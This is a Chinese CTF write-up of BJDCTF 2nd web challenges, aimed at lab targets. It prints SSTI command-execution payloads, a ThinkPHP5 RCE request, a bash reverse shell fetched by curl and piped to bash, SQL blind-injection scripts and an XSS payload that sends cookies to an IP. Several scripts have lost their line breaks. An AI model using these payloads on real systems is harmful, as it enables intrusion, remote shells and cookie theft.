[BJDCTF 2nd] WEB 简单题汇总

2024-01-23 21:32
文章标签 简单 web 汇总 bjdctf 2nd

本文主要是介绍[BJDCTF 2nd] WEB 简单题汇总,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Web简单题复现

  • [BJDCTF 2nd]fake google
    • 方法一:
    • 方法二:
  • [BJDCTF 2nd]old-hack
  • [BJDCTF 2nd]duangShell
  • [BJDCTF 2nd]简单注入
    • 方法一:
    • 方法二:
    • 方法三:
  • [BJDCTF 2nd]假猪套天下第一
  • [BJDCTF 2nd]Schrödinger
  • [BJDCTF 2nd]xss之光
  • [BJDCTF 2nd]elementmaster


看了看杂项的题目,我发现web的脑洞就是个弟弟

[BJDCTF 2nd]fake google

在这里插入图片描述
经过测试,存在xss和模板注入,这题是模板注入

方法一:

参考文献

在这里插入图片描述


<class ‘os._wrap_close’>,os命令相信你看到就感觉很亲切。我们正是要从这个类中寻找我们可利用的方法,通过大概猜测找到是第119个类,0也对应一个类,所以这里写[118]。
可以发现是存在这个类的
在这里插入图片描述
接下来用脚本跑索引

import requestsurl ="http://67a8fe61-a3c7-42f4-85ae-f8e301bd7f30.node3.buuoj.cn/qaq"
temp={}
for i in range(1000):url = "http://537306c0-5737-4a8b-8db5-8fd5c2362b4f.node3.buuoj.cn/qaq?name={{\"\".__class__.__bases__[0].__subclasses__()[%d]}}" % ir = requests.get(url)print (url)print(r.text)if "os._wrap_close" in r.text:print(url)print(r.text)break

索引是117
接下来测试看看能不能命令执行
payload

{{"".__class__.__bases__[0].__subclasses__()[117].__init__.__globals__['popen']('ls /').read()}}

在这里插入图片描述
成功查看根目录下文件,可以发现flag文件在根目录下,查看即可

方法二:

网上看到的第二个方法(其实就是写个python进去找索引,emmm,对于现在的我来说可能想不到这种注入,只能写脚本跑了)

{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}


[BJDCTF 2nd]old-hack

在这里插入图片描述

题目已提示是thinkphp5,自行去搜thinkphp5的漏洞,会找到对应版本,
参考文献

根据参考文献
可得出payload:

get请求
s=captcha
post请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /

在这里插入图片描述
查看根目录下的flag即可




[BJDCTF 2nd]duangShell

在这里插入图片描述

题目已提示是swp备份文件泄露
.index.php.swp 即可拿到备份源码
vim -r 打开 解析即可

<html lang="en">
<head><meta charset="UTF-8"><title>give me a girl</title>
</head>
<body><center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {die("where is P3rh4ps's girl friend ???");
} else {$girl = $_POST['];if (preg_match('/\>|\\\/', $girl)) {die('just girl');} else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";} else {//duangShell~~~~exec($girl);}
}

emmmmm,过滤了很多东西,当时做到这无从下手,只能看web了,新知识,反弹shell,在buu上因为内网的原因,这题需要用内网开linux靶机,弄了比较长的时间
参考文献

因为exec()不会回显(之前一直琢磨怎么让他回显。。。)反弹shell能够解决而且又没有过滤curl。
先在/var/www/html,创建一个shell.txt文件
输入的命令为:

bash -i >& /dev/tcp/ip/port 0>&1

ip 为内网主机的ip地址,port为端口,随便输(这里以端口为2333为例)

再传post值

girl_friend=curl http://内网ip/shell.txt|bash

再nc

nc -lvp 2333

学到一个新指令

find / -name flag

找到flag所在目录查看即可


[BJDCTF 2nd]简单注入

在这里插入图片描述
首先先测试看看他过滤了啥
在这里插入图片描述
发现过滤了以下指令

union , select , = , ' , & , && , - ,  " , and 

(当时看到分号被过滤了,顿时不想做了)

首先联合注入肯定是不行的,试了试报错注入,没有报错回显

考虑盲注(我构造的盲注语句好像不行,只能看web了)

方法一:

新知识(正则表达式注入)
参考文献
由于过滤了双引号,新东西:
BINARY 运算符将紧随其后的 string 转换为 二进制字符串
好像用二分法跑比较麻烦,只能遍历了。。。。。

import requestsurl ="http://b688f906-6a48-48c8-af28-74052e3b3905.node3.buuoj.cn"
temp={}
password =""
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789']
a = '0x5e'for i in range(100):for j in string:str = hex(j).replace('0x', '')# 查用户名username = "or username regexp binary %s #" % (a + str)print(username)data = {"username": "\\", "password": username}# 查密码#payload = "or password regexp binary %s #" % (a + str) #print(payload)#data={"username" :"\\","password" : payload }r = requests.post(url,data=data)#print(r.text)if "BJD needs to be stronger" in r.text:password +=chr(j)print(password)a+=strbreakif "You konw ,P3rh4ps needs a girl friend" in r.text:breakprint(password)

根据上面的查询到用户名以及密码,直接登录即可

方法二:

转义单引号
在这里插入图片描述
可以发现password逃逸出去了

payload:

password=or 1 #&username=admin\

在这里插入图片描述
输入进去可以发现下面的回显不一样了
payload:

password=^ (ascii(substr((password),1,1))>1)#&username=admin\

可以直接异或,长知识了

接下来上脚本:(二分法跑)

import requests
import timeurl = "http://aed2ff9b-a59f-4192-94ce-362ee82b9d30.node3.buuoj.cn/index.php"
temp = {}
password = ""
for i in range(1,1000):time.sleep(0.06)low = 32high =128mid = (low+high)//2while(low<high):payload = '^ (ascii(substr((password),%d,1))>%d)#' % (i,mid)temp={"username":"admin\\","password": payload}r = requests.post(url,data=temp)print(low,high,mid,":")if "P3rh4ps" in r.text:low = mid+1else:high = midmid =(low+high)//2if(mid ==32 or mid ==127):breakpassword +=chr(mid)print(password)print("password=",password)

方法三:

时间盲注,
csdn参考文献


[BJDCTF 2nd]假猪套天下第一

在这里插入图片描述

刚开始以为是sql注入,后来抓包的时候看到了隐藏文件(访问源代码也可以)
在这里插入图片描述
有个 L0g1n.php的页面,进去看看,记得刷新一下页面
在这里插入图片描述
要修改时间,放到burp中,
起初以为是data,看到cookie里有个time的值,修改后
在这里插入图片描述
要从本地访问,有三种X-Forwarded-For,X-Forwarded-Host,CLIENT-IP,host
这里只能用CLIENT-IP或者X-Real-IP
剩下的不说了,就按照提示来就行了,改http头就行
参考文献
这里要说下Commodo 64这个浏览器,谷歌搜索
在这里插入图片描述
真正的名字是 Commodore 64
最后的http头如下
在这里插入图片描述
base64解密即可


[BJDCTF 2nd]Schrödinger

这题脑洞太大了
自行参考
在这里插入图片描述
可以发现隐藏了test.php,进去之后是一段登录,但是这题并不是要你sql注入
我们返回主页看看
在这里插入图片描述
主页的英文翻译提示我们可以爆破密码
将test.php放到下面input
再check抓包

在这里插入图片描述
可以发现cookie值多了个时间戳(base64解码即可得到)
将时间戳置空
在这里插入图片描述
弹出av号,去b站搜,评论区就有


[BJDCTF 2nd]xss之光

在这里插入图片描述

用kali自带的dirb扫描目录,发现是.git泄露
使用githack得到源码

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

没有类的情况下,可以进行原生类反序列化

参考文献
可以使用Exception类进行构造

$a = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($a));

赵老板赛后应该改了一下源码,这段js,我看别的web试出来了。
payload:

<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>

返回抓包的时候发现弹出cookie
在这里插入图片描述


[BJDCTF 2nd]elementmaster

脑洞题

查看源代码,发现id的值不太对劲,进行十六进制转字符窜
Po.php进去之后啥都没有,看看图片,提到了放射性元素,Po刚好是化学元素
在这里插入图片描述
可能要我们遍历化学元素。。。。
(据说这道题是美国的一道原题改的,还改简单了)

接下来上我的垃圾脚本,

import requests
import timelist = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar','K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']
t =""
for i in list:url = "http://cfddf3d4-983f-4513-9a40-9f65cbcf45e4.node3.buuoj.cn/"time.sleep(0.06)i+=".php"print(i)url= url+iprint(url)print('\n')r = requests.get(url)if r.status_code == 200:t += r.textprint(t)print(t)
url = "http://cfddf3d4-983f-4513-9a40-9f65cbcf45e4.node3.buuoj.cn/"
print(url+t)

跑出来后
在这里插入图片描述
进入链接即可

这篇关于[BJDCTF 2nd] WEB 简单题汇总的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/637589

相关文章

Mysql表的简单操作(基本技能)

《Mysql表的简单操作(基本技能)》在数据库中,表的操作主要包括表的创建、查看、修改、删除等,了解如何操作这些表是数据库管理和开发的基本技能,本文给大家介绍Mysql表的简单操作,感兴趣的朋友一起看... 目录3.1 创建表 3.2 查看表结构3.3 修改表3.4 实践案例:修改表在数据库中,表的操作主要

JSON Web Token在登陆中的使用过程

《JSONWebToken在登陆中的使用过程》:本文主要介绍JSONWebToken在登陆中的使用过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录JWT 介绍微服务架构中的 JWT 使用结合微服务网关的 JWT 验证1. 用户登录,生成 JWT2. 自定义过滤

springboot简单集成Security配置的教程

《springboot简单集成Security配置的教程》:本文主要介绍springboot简单集成Security配置的教程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,... 目录集成Security安全框架引入依赖编写配置类WebSecurityConfig(自定义资源权限规则

一文教你如何将maven项目转成web项目

《一文教你如何将maven项目转成web项目》在软件开发过程中,有时我们需要将一个普通的Maven项目转换为Web项目,以便能够部署到Web容器中运行,本文将详细介绍如何通过简单的步骤完成这一转换过程... 目录准备工作步骤一:修改​​pom.XML​​1.1 添加​​packaging​​标签1.2 添加

如何使用Python实现一个简单的window任务管理器

《如何使用Python实现一个简单的window任务管理器》这篇文章主要为大家详细介绍了如何使用Python实现一个简单的window任务管理器,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起... 任务管理器效果图完整代码import tkinter as tkfrom tkinter i

C++中函数模板与类模板的简单使用及区别介绍

《C++中函数模板与类模板的简单使用及区别介绍》这篇文章介绍了C++中的模板机制,包括函数模板和类模板的概念、语法和实际应用,函数模板通过类型参数实现泛型操作,而类模板允许创建可处理多种数据类型的类,... 目录一、函数模板定义语法真实示例二、类模板三、关键区别四、注意事项 ‌在C++中,模板是实现泛型编程

使用EasyExcel实现简单的Excel表格解析操作

《使用EasyExcel实现简单的Excel表格解析操作》:本文主要介绍如何使用EasyExcel完成简单的表格解析操作,同时实现了大量数据情况下数据的分次批量入库,并记录每条数据入库的状态,感兴... 目录前言固定模板及表数据格式的解析实现Excel模板内容对应的实体类实现AnalysisEventLis

Java中数组转换为列表的两种实现方式(超简单)

《Java中数组转换为列表的两种实现方式(超简单)》本文介绍了在Java中将数组转换为列表的两种常见方法使用Arrays.asList和Java8的StreamAPI,Arrays.asList方法简... 目录1. 使用Java Collections框架(Arrays.asList)1.1 示例代码1.

Java8需要知道的4个函数式接口简单教程

《Java8需要知道的4个函数式接口简单教程》:本文主要介绍Java8中引入的函数式接口,包括Consumer、Supplier、Predicate和Function,以及它们的用法和特点,文中... 目录什么是函数是接口?Consumer接口定义核心特点注意事项常见用法1.基本用法2.结合andThen链

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re